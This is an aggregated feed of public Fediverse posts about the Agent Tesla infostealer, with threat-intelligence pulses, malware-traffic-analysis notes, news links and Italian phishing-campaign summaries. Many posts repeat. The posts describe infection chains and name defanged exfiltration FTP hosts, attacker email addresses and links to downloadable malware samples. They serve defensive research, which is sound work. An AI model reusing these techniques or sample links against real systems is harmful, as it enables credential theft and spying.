#agenttesla — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #agenttesla, aggregated by home.social.
-
Analyzing a Malicious Compiled HTML Help File Delivering Agent Tesla
Pulse ID: 69eaf82210e0ac6fd2a26c35
Pulse Link: https://otx.alienvault.com/pulse/69eaf82210e0ac6fd2a26c35
Pulse Author: Tr1sa111
Created: 2026-04-24 04:57:06Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#AgentTesla #CyberSecurity #HTML #InfoSec #OTX #OpenThreatExchange #Tesla #bot #Tr1sa111
-
Analyzing a Malicious Compiled HTML Help File Delivering Agent Tesla
This analysis examines an attack chain utilizing malicious compiled HTML help (.chm) files for initial payload delivery. The attack begins with a 7zip compressed file containing a weaponized CHM file that displays a decoy window while executing obfuscated JavaScript code. This JavaScript launches PowerShell commands that verify internet connectivity by pinging Google, then downloads additional PowerShell code disguised as a JPEG file. The second stage decompresses and loads multiple byte arrays in memory, including a loader DLL and compressed Agent Tesla payload. The final Agent Tesla sample executes through process injection into RegAsm.exe and uses FTP protocol to exfiltrate stolen data including keystrokes, screenshots, and camera recordings to attacker-controlled infrastructure at ftp.videoalliance[.]ru.
Pulse ID: 69e991a65ee2b4802a077236
Pulse Link: https://otx.alienvault.com/pulse/69e991a65ee2b4802a077236
Pulse Author: AlienVault
Created: 2026-04-23 03:27:34Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#7Zip #AgentTesla #CyberSecurity #Google #HTML #InfoSec #Java #JavaScript #OTX #OpenThreatExchange #PowerShell #RAT #Tesla #Troll #ZIP #bot #AlienVault
-
Analyzing a Malicious Compiled HTML Help File Delivering Agent Tesla
This analysis examines an attack chain utilizing malicious compiled HTML help (.chm) files for initial payload delivery. The attack begins with a 7zip compressed file containing a weaponized CHM file that displays a decoy window while executing obfuscated JavaScript code. This JavaScript launches PowerShell commands that verify internet connectivity by pinging Google, then downloads additional PowerShell code disguised as a JPEG file. The second stage decompresses and loads multiple byte arrays in memory, including a loader DLL and compressed Agent Tesla payload. The final Agent Tesla sample executes through process injection into RegAsm.exe and uses FTP protocol to exfiltrate stolen data including keystrokes, screenshots, and camera recordings to attacker-controlled infrastructure at ftp.videoalliance[.]ru.
Pulse ID: 69e991a65ee2b4802a077236
Pulse Link: https://otx.alienvault.com/pulse/69e991a65ee2b4802a077236
Pulse Author: AlienVault
Created: 2026-04-23 03:27:34Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#7Zip #AgentTesla #CyberSecurity #Google #HTML #InfoSec #Java #JavaScript #OTX #OpenThreatExchange #PowerShell #RAT #Tesla #Troll #ZIP #bot #AlienVault
-
Analyzing a Malicious Compiled HTML Help File Delivering Agent Tesla
This analysis examines an attack chain utilizing malicious compiled HTML help (.chm) files for initial payload delivery. The attack begins with a 7zip compressed file containing a weaponized CHM file that displays a decoy window while executing obfuscated JavaScript code. This JavaScript launches PowerShell commands that verify internet connectivity by pinging Google, then downloads additional PowerShell code disguised as a JPEG file. The second stage decompresses and loads multiple byte arrays in memory, including a loader DLL and compressed Agent Tesla payload. The final Agent Tesla sample executes through process injection into RegAsm.exe and uses FTP protocol to exfiltrate stolen data including keystrokes, screenshots, and camera recordings to attacker-controlled infrastructure at ftp.videoalliance[.]ru.
Pulse ID: 69e991a65ee2b4802a077236
Pulse Link: https://otx.alienvault.com/pulse/69e991a65ee2b4802a077236
Pulse Author: AlienVault
Created: 2026-04-23 03:27:34Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#7Zip #AgentTesla #CyberSecurity #Google #HTML #InfoSec #Java #JavaScript #OTX #OpenThreatExchange #PowerShell #RAT #Tesla #Troll #ZIP #bot #AlienVault
-
Analyzing a Malicious Compiled HTML Help File Delivering Agent Tesla
This analysis examines an attack chain utilizing malicious compiled HTML help (.chm) files for initial payload delivery. The attack begins with a 7zip compressed file containing a weaponized CHM file that displays a decoy window while executing obfuscated JavaScript code. This JavaScript launches PowerShell commands that verify internet connectivity by pinging Google, then downloads additional PowerShell code disguised as a JPEG file. The second stage decompresses and loads multiple byte arrays in memory, including a loader DLL and compressed Agent Tesla payload. The final Agent Tesla sample executes through process injection into RegAsm.exe and uses FTP protocol to exfiltrate stolen data including keystrokes, screenshots, and camera recordings to attacker-controlled infrastructure at ftp.videoalliance[.]ru.
Pulse ID: 69e991a65ee2b4802a077236
Pulse Link: https://otx.alienvault.com/pulse/69e991a65ee2b4802a077236
Pulse Author: AlienVault
Created: 2026-04-23 03:27:34Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#7Zip #AgentTesla #CyberSecurity #Google #HTML #InfoSec #Java #JavaScript #OTX #OpenThreatExchange #PowerShell #RAT #Tesla #Troll #ZIP #bot #AlienVault
-
Analyzing a Malicious Compiled HTML Help File Delivering Agent Tesla
This analysis examines an attack chain utilizing malicious compiled HTML help (.chm) files for initial payload delivery. The attack begins with a 7zip compressed file containing a weaponized CHM file that displays a decoy window while executing obfuscated JavaScript code. This JavaScript launches PowerShell commands that verify internet connectivity by pinging Google, then downloads additional PowerShell code disguised as a JPEG file. The second stage decompresses and loads multiple byte arrays in memory, including a loader DLL and compressed Agent Tesla payload. The final Agent Tesla sample executes through process injection into RegAsm.exe and uses FTP protocol to exfiltrate stolen data including keystrokes, screenshots, and camera recordings to attacker-controlled infrastructure at ftp.videoalliance[.]ru.
Pulse ID: 69e991a65ee2b4802a077236
Pulse Link: https://otx.alienvault.com/pulse/69e991a65ee2b4802a077236
Pulse Author: AlienVault
Created: 2026-04-23 03:27:34Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#7Zip #AgentTesla #CyberSecurity #Google #HTML #InfoSec #Java #JavaScript #OTX #OpenThreatExchange #PowerShell #RAT #Tesla #Troll #ZIP #bot #AlienVault
-
2026-02-03 (Tuesday): #GuLoader for #AgentTesla style malware with FTP data exfiltration.
A #pcap of the infection traffic, associated files, and a list of indicators are available at https://www.malware-traffic-analysis.net/2026/02/03/index.html
Two online sandboxes tag this sample as AgentTesla, but I'm not sure what the actual name of this malware is.
- https://tria.ge/260203-tvhlyahx7c
- https://app.any.run/tasks/0840196f-2b8f-415c-8ca7-af0c8f394b0d -
Fake Leonardo DiCaprio Movie Torrent Drops Agent Tesla Through Layered PowerShell Chain
#AgentTesla
https://www.bitdefender.com/en-us/blog/labs/fake-leonardo-dicaprio-movie-torrent-agent-tesla-powershell -
📬 „One Battle After Another”: Torrent versteckt Malware in Untertiteln
#Cyberangriffe #ITSicherheit #Warez #AgentTesla #BeniciodelToro #Bitdefender #LeonardoDiCaprio #OneBattleAfterAnother #SeanPenn https://sc.tarnkappe.info/d99b71 -
Cybercriminals are luring torrent users with a fake Leonardo DiCaprio movie, "One Battle After Another," hiding Agent Tesla RAT in subtitle files and disguised payloads. The stealthy chain uses Windows tools for fileless infection, keylogging, and data theft—stay safe! 🚨🎥💻 https://cyberinsider.com/malware-sneaked-via-subtitles-file-of-fake-dicaprio-movie-torrent/ #Cybersecurity #Malware #AgentTesla #Newz
-
„One Battle After Another“-Torrent versteckt Malware in Untertitel‑Dateien
Zu Weihnachten wird viel gestreamt. Doch: Vorsicht bei illegalen Quellen! Gerade frisch auf dem Markt: ein gefälschter Torrent des Leonardo DiCaprio-Films „One Battle After Another“. Gratis mit dabei die SpyWare Agent Tesla.
Mehr: https://maniabel.work/archiv/783
#SpyTool #AgentTesla #windows #PowerShellScript #infosec #infosecnews #BeDiS
-
Torrent for DiCaprio’s “One Battle After Another” Movie Drops Agent Tesla https://hackread.com/dicaprio-one-battle-after-another-torrent-agent-tesla/ #FakeOneBattleAfterAnother #Cybersecurity #bitdefender #CyberAttack #AgentTesla #Security #Malware #Torrent #Movies #Fraud #Scam
-
Watch out as fake torrent for DiCaprio’s “One Battle After Another” is spreading Agent Tesla malware through malicious subtitles and hidden scripts.
Read: https://hackread.com/dicaprio-one-battle-after-another-torrent-agent-tesla/
#Cybersecurity #AgentTesla #Malware #Windows #OneBattleAfterAnother
-
Top 3 Malware Families in Q4: How to Keep Your SOC Ready https://hackread.com/top-3-malware-families-in-q4-how-to-keep-your-soc-ready/ #ThreatIntelligence #Cybersecurity #Vulnerability #LummaStealer #AgentTesla #Security #Malware #ANYRUN #XWorm #SOC
-
Top 3 Malware Families in Q4: How to Keep Your SOC Ready https://hackread.com/top-3-malware-families-in-q4-how-to-keep-your-soc-ready/ #ThreatIntelligence #Cybersecurity #Vulnerability #LummaStealer #AgentTesla #Security #Malware #ANYRUN #XWorm #SOC
-
FakeUpdates, Remcos, AgentTesla Top Malware Charts in Stealth Attack Surge – Source:hackread.com https://ciso2ciso.com/fakeupdates-remcos-agenttesla-top-malware-charts-in-stealth-attack-surge-sourcehackread-com/ #1CyberSecurityNewsPost #CyberSecurityNews #cybersecurity #CyberAttack #FakeUpdates #AgentTesla #Hackread #security #malware #Remcos
-
FakeUpdates, Remcos, AgentTesla Top Malware Charts in Stealth Attack Surge https://hackread.com/fakeupdates-remcos-agenttesla-malware-attack-charts/ #Cybersecurity #CyberAttack #FakeUpdates #AgentTesla #Security #Malware #Remcos
-
2025-02-12 (Wed): #VIP_Recovery (an #AgentTesla variant) from Brazil #malspam --> zip attachment --> extracted EXE.
File name: Factura Gastos.exe
Email accounts for data exfiltration: antonipont@grupobdb[.]com --> cludsewe3@gmail[.]com
EXE available at: https://bazaar.abuse.ch/sample/c7620ccaf9c2d47ba08cf85e65e55ea974f8887e18d96574a1aa63f09e836451/
-
2025-02-07 (Friday): Today's boring example of #malpsam pushing #GuLoader for #AgentTesla style malware. EXE of this malware available at https://bazaar.abuse.ch/sample/833aae0bc34e211145371b619b7c542864e9f864e26de1690fd2f6be76fcb174
-
2025-01-31 (Friday): Two pcaps with traffic of #AgentTesla-style data exfil.
One #pcap has FTP exfil, while the other pcap is "VIP Recovery" and has SMTP exfil.
Pcaps available at https://www.malware-traffic-analysis.net/2025/01/31/index.html
-
New TorNet Backdoor Exploits TOR Network in Advanced Phishing Attack – Source:hackread.com https://ciso2ciso.com/new-tornet-backdoor-exploits-tor-network-in-advanced-phishing-attack-sourcehackread-com/ #1CyberSecurityNewsPost #CyberSecurityNews #cybersecurity #Vulnerability #PhishingScam #CyberAttack #AgentTesla #backdoor #Hackread #Phishing #security #Germany #malware #Poland #TorNet #Tor
-
New TorNet Backdoor Exploits TOR Network in Advanced Phishing Attack – Source:hackread.com https://ciso2ciso.com/new-tornet-backdoor-exploits-tor-network-in-advanced-phishing-attack-sourcehackread-com/ #1CyberSecurityNewsPost #CyberSecurityNews #cybersecurity #Vulnerability #PhishingScam #CyberAttack #AgentTesla #backdoor #Hackread #Phishing #security #Germany #malware #Poland #TorNet #Tor
-
New TorNet Backdoor Exploits TOR Network in Advanced Phishing Attack – Source:hackread.com https://ciso2ciso.com/new-tornet-backdoor-exploits-tor-network-in-advanced-phishing-attack-sourcehackread-com/ #1CyberSecurityNewsPost #CyberSecurityNews #cybersecurity #Vulnerability #PhishingScam #CyberAttack #AgentTesla #backdoor #Hackread #Phishing #security #Germany #malware #Poland #TorNet #Tor
-
New TorNet Backdoor Exploits TOR Network in Advanced Phishing Attack – Source:hackread.com https://ciso2ciso.com/new-tornet-backdoor-exploits-tor-network-in-advanced-phishing-attack-sourcehackread-com/ #1CyberSecurityNewsPost #CyberSecurityNews #cybersecurity #Vulnerability #PhishingScam #CyberAttack #AgentTesla #backdoor #Hackread #Phishing #security #Germany #malware #Poland #TorNet #Tor
-
New TorNet Backdoor Exploits TOR Network in Advanced Phishing Attack https://hackread.com/tornet-backdoor-exploits-tor-network-phishing-attack/ #Cybersecurity #Vulnerability #PhishingScam #CyberAttack #AgentTesla #Security #backdoor #Phishing #Malware #Germany #Poland #TorNet #Tor
-
New TorNet Backdoor Exploits TOR Network in Advanced Phishing Attack https://hackread.com/tornet-backdoor-exploits-tor-network-phishing-attack/ #Cybersecurity #Vulnerability #PhishingScam #CyberAttack #AgentTesla #Security #backdoor #Phishing #Malware #Germany #Poland #TorNet #Tor
-
New TorNet Backdoor Exploits TOR Network in Advanced Phishing Attack https://hackread.com/tornet-backdoor-exploits-tor-network-phishing-attack/ #Cybersecurity #Vulnerability #PhishingScam #CyberAttack #AgentTesla #Security #backdoor #Phishing #Malware #Germany #Poland #TorNet #Tor
-
New TorNet Backdoor Exploits TOR Network in Advanced Phishing Attack https://hackread.com/tornet-backdoor-exploits-tor-network-phishing-attack/ #Cybersecurity #Vulnerability #PhishingScam #CyberAttack #AgentTesla #Security #backdoor #Phishing #Malware #Germany #Poland #TorNet #Tor
-
2025-01-09 (Thursday):
#CVE-2017-0199 Excel (#XLS) file --> #HTA --> #VBS --> #steganography --> #DBatLoader or #GuLoader style malware for #AgentTesla. Data exfil over FTP. A #pcap from an infection, the associated malware, and more info available at www.malware-traffic-analysis.net/2025/01/09/index.html
-
2025-01-09 (Thursday):
#CVE-2017-0199 Excel (#XLS) file --> #HTA --> #VBS --> #steganography --> #DBatLoader or #GuLoader style malware for #AgentTesla. Data exfil over FTP. A #pcap from an infection, the associated malware, and more info available at www.malware-traffic-analysis.net/2025/01/09/index.html
-
2025-01-09 (Thursday):
#CVE-2017-0199 Excel (#XLS) file --> #HTA --> #VBS --> #steganography --> #DBatLoader or #GuLoader style malware for #AgentTesla. Data exfil over FTP. A #pcap from an infection, the associated malware, and more info available at www.malware-traffic-analysis.net/2025/01/09/index.html
-
2025-01-09 (Thursday):
#CVE-2017-0199 Excel (#XLS) file --> #HTA --> #VBS --> #steganography --> #DBatLoader or #GuLoader style malware for #AgentTesla. Data exfil over FTP. A #pcap from an infection, the associated malware, and more info available at www.malware-traffic-analysis.net/2025/01/09/index.html
-
2025-01-09 (Thursday):
#CVE-2017-0199 Excel (#XLS) file --> #HTA --> #VBS --> #steganography --> #DBatLoader or #GuLoader style malware for #AgentTesla. Data exfil over FTP. A #pcap from an infection, the associated malware, and more info available at www.malware-traffic-analysis.net/2025/01/09/index.html
-
2024-12-04 (Wednesday): #AgentTesla variant using FTP for data exfiltration.
Don't know if this is OriginLogger Snake (Key) Logger, VIP Recovery/VIP Key Logger, but it's a variant of AgentTesla.
I've posted a sanitized copy of the email distributing the malware, a #pcap from an infection run, the associated #malware samples, and a list of indicators at https://www.malware-traffic-analysis.net/2024/12/04/index.html
-
2024-11-25 (Monday): I love it when criminals email malware directly to my inbox. This one is #AgentTesla (or #OriginLogger or whatever it's called now) using FTP for data exfiltration.
It sends harvested login credentials, browser cookies and keylogger data to an FTP server at ftp.ercolina-usa[.]com approx every 10 minutes.
As noted in one of the images, two-letter indicators in the file names indicate the type of exfiltrated data:
PW = login credentials harvested from the infected windows host (passwords)
CO = cookies and other data from web browsers on the infected host
KL = Keylogger data from any collected keystrokes on the infected host.
Attached disk image file: https://bazaar.abuse.ch/sample/7a11d2d4ea5b0bf486c6e6695ff919e58aa54babb77061f4bbfe476ce1ec1738
Extracted AgentTesla EXE: https://bazaar.abuse.ch/sample/2362b4a5329f506af677d1e4cac2b92da252afdf4842bf4e8796b43c4ccb6714
-
CapLoader wasn’t designed as an alternative to a traditional NIDS, but the Alerts tab often gives a VERY good overview of the malicious traffic. Here’s a screenshot of CapLoader’s alerts for some recent PCAP files from malware-traffic-analysis.net.
#Lumma #GootLoader #AgentTesla #RURAT #Remcos #RedLine #BackConnect
-
Campagne #Malware #Italy Week 35
🔥☠️💣👻
#VIPKeylogger: Bonifico
#Remcos: Spedizioni
#Formbook: Ordini
#AgentTesla: Pagamento
#Modiloader: Preventivi
#APK #Zanubis: Protezione Device -
Campagne #Malware #Italy Week 32
🔥☠️💣👻#SnakeKeyLogger: Citazione
#Guloader: Ordine
#Formbook: Modulo bancario
#AsyncRAT: Documento
#RemcosRAT: Prezzi
#AgentTesla: Preventivo
#ModiLoader: Pagamento
#StrRat: Ordine
#RedLine: Quotazione
#Vidar: Pagamento
#Ousaban: Documento -
Campagne #Malware #Italy Week 29
☠️💣🔥👻
#AgentTesla: Ordine
#Formbook: Offerta
#GuLoader: Fattura Elettronica
#Remcos: Bank
#Lokibot: Delivery
#SmokeLoader: Pagamenti
#Irata: Malware APK
#RedLine: Offerta
#Neshta: Ordine
#Ousaban: Processo
#SnakeKeylogger: Fattura -
Belarusian Government-Linked Threat Actor ‘UNC1151’ Targets Ukraine’s Ministry of Defense https://thecyberexpress.com/unc1151-targets-ukraine-ministry-of-defense/ #UkrainesMinistryofDefence #TheCyberExpressNews #CybersecurityNews #cybersecuritynews #CRILresearchers #TheCyberExpress #FirewallDaily #cybersecurity #ThreatActors #cobaltstrike #AgentTesla #Phishing #njRAT #CRIL
-
📬 Foxit PDF Exploit: Ein unbedachter Klick löst Angriffskette aus
#ITSicherheit #AgentTesla #DoNotTeam #Exploid #FOXITPDF #FoxitReader #pdf https://sc.tarnkappe.info/17d3b6 -
📬 Foxit PDF Exploit: Ein unbedachter Klick löst Angriffskette aus
#ITSicherheit #AgentTesla #DoNotTeam #Exploid #FOXITPDF #FoxitReader #pdf https://sc.tarnkappe.info/17d3b6 -
📬 Foxit PDF Exploit: Ein unbedachter Klick löst Angriffskette aus
#ITSicherheit #AgentTesla #DoNotTeam #Exploid #FOXITPDF #FoxitReader #pdf https://sc.tarnkappe.info/17d3b6 -
📬 Foxit PDF Exploit: Ein unbedachter Klick löst Angriffskette aus
#ITSicherheit #AgentTesla #DoNotTeam #Exploid #FOXITPDF #FoxitReader #pdf https://sc.tarnkappe.info/17d3b6 -
📬 Foxit PDF Exploit: Ein unbedachter Klick löst Angriffskette aus
#ITSicherheit #AgentTesla #DoNotTeam #Exploid #FOXITPDF #FoxitReader #pdf https://sc.tarnkappe.info/17d3b6 -
Campagne #Malware #Italy Week 13
👻💣🔥☠️
#AgentTesla: Pagamenti
#Remcos: Delivery
#Irata: APK Bank
#Phorpiex: Documenti
#Guloader: Ordine
#PlanetStealer: Conferma
#Lokibot: Preventivo
#Pikabot: Resend -
Campagne #Malware #Italy Week 08
🔥☠️💣👻
#AgentTesla: Ordine
#Formbook: Bonifico
#SpyNote: APK Bank
#Pikabot: Resend
#AveMaria: Quote
#ModiLoader: Elenco
#WiKiloader: Fattura
#Astaroth: Fattura
#Remcos: Giacenza GLS -
⚠️ New day and new "Invio Ordine Accompagnatorio" spread #AgentTesla in #Italy!
-
Here's some data analysis on the victims of the popular infostealer #AgentTesla aka #OriginLogger🔑⌨️🪵 https://www.bitsight.com/blog/data-insights-agenttesla-and-originlogger-victims
-
Campagne #Malware #Italy Week 41
🔥 Persistenti
#Ursnif: #AgenziaEntrate
#DarkGate: Resend link a ZIP
#AgentTesla: Pagamento💣 D'eccezione
#RemcosRat: Pagamento
#Lokibot: Bank
#ScreenConnect: Fattura PDF